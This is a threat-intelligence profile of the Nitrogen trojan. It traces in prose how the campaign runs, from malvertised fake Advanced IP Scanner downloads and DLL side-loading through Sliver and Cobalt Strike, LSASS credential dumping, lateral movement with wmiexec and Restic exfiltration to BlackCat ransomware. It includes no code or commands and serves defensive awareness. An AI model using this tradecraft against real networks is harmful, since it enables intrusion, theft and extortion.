Nitrogen (Trojan) – Malware

Overview

Nitrogen malware is a sophisticated and stealthy piece of malicious software that has recently gained attention due to its involvement in targeted cyberattacks. Known for its ability to evade detection and employ a variety of post-exploitation tools, Nitrogen has proven to be a formidable weapon in the hands of cybercriminals. This malware is part of an increasingly concerning trend where attackers leverage legitimate software, such as network utilities and remote management tools, to conceal malicious activities, making detection significantly more challenging for defenders.

The Nitrogen malware is particularly notable for its use in multi-stage attack chains, often starting with a seemingly innocuous download that is delivered through social engineering techniques like malvertising or phishing. Once executed, it acts as a backdoor, granting threat actors persistent access to compromised systems. The malware’s ability to drop additional payloads, such as Sliver and Cobalt Strike, further escalates its impact, enabling attackers to carry out complex post-exploitation activities. These include lateral movement, credential theft, data exfiltration, and, in some cases, the deployment of ransomware, as demonstrated in recent campaigns.

Targets

Information

Individuals

How they operate

The initial access point for Nitrogen malware often begins with a drive-by download facilitated through malvertising or phishing campaigns. The attackers use fraudulent websites or tampered versions of legitimate software, such as network utilities like Advanced IP Scanner, to deliver a malicious ZIP file. This file typically contains an executable designed to exploit the victim’s trust in the legitimate software. Once the ZIP file is extracted and the executable is run, the malware installs itself on the system, often masquerading as a legitimate Python binary. This executable side-loads a specially crafted Python Dynamic Link Library (DLL) that triggers the execution of Nitrogen’s malicious code.

Upon execution, Nitrogen drops additional payloads to escalate the attack. One of the key components that Nitrogen deploys is the Sliver beacon, a post-exploitation framework commonly used by cybercriminals to maintain control over the compromised system. This beacon, along with Cobalt Strike, is loaded into memory using a technique known as “Py-Fuscate.” Py-Fuscate obfuscates Python scripts, making them difficult for traditional antivirus tools to detect. By hiding its payloads in memory and avoiding traditional file-based detection methods, Nitrogen can establish a persistent foothold on the compromised system without raising suspicion.

Once the malware is active, it performs extensive discovery and enumeration of the compromised environment. Nitrogen utilizes a combination of Windows utilities, including net, ipconfig, and nltest, along with more advanced tools like PowerSploit and SharpHound, to map out the network and gather valuable information about the domain controllers, local and domain administrators, and other network configurations. By doing so, the attackers can identify key systems and escalate their privileges, allowing them to move laterally within the network and access more sensitive assets.

The malware’s lateral movement is facilitated by tools such as Impacket’s wmiexec, which allows the attacker to execute commands remotely on other machines within the network. After compromising additional machines, the attackers repeat the same persistence techniques—creating scheduled tasks and modifying registry keys—ensuring that the malware remains active and undetected across the environment. Nitrogen also performs credential dumping, often targeting LSASS (Local Security Authority Subsystem Service) memory, to harvest login credentials for high-privilege accounts, further expanding the attacker’s control over the compromised network.

Once the attackers have sufficient access to critical infrastructure, Nitrogen deploys other tools to exfiltrate data or prepare for final stages of the attack. One such tool is the open-source backup software, Restic, which is used to exfiltrate files from file shares to remote servers controlled by the attackers. This phase often involves significant stealth, as the attackers may lay low for days, monitoring backup systems and network configurations before executing their ultimate objective.

The final phase of the attack involves the deployment of BlackCat ransomware, which is distributed across the network once the attackers have gained full control. Using tools like PsExec and the Windows copy utility, the ransomware binary is executed on compromised hosts. The malware’s final payload is designed to encrypt files on infected systems and display ransom notes, demanding payment for decryption keys. The attackers also take measures to ensure that the ransomware runs in a safe mode environment, making it harder for users to intervene and stop the encryption process.

Overall, Nitrogen malware is a highly advanced and multi-faceted threat that leverages a combination of social engineering, obfuscation, and post-exploitation tools to maintain persistence and achieve its objectives. Its ability to evade traditional detection methods and move laterally within networks makes it a dangerous threat for organizations, particularly those lacking advanced threat detection capabilities. Organizations must implement robust security measures, including behavioral monitoring, network segmentation, and regular credential audits, to defend against such sophisticated attacks.

References

• Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware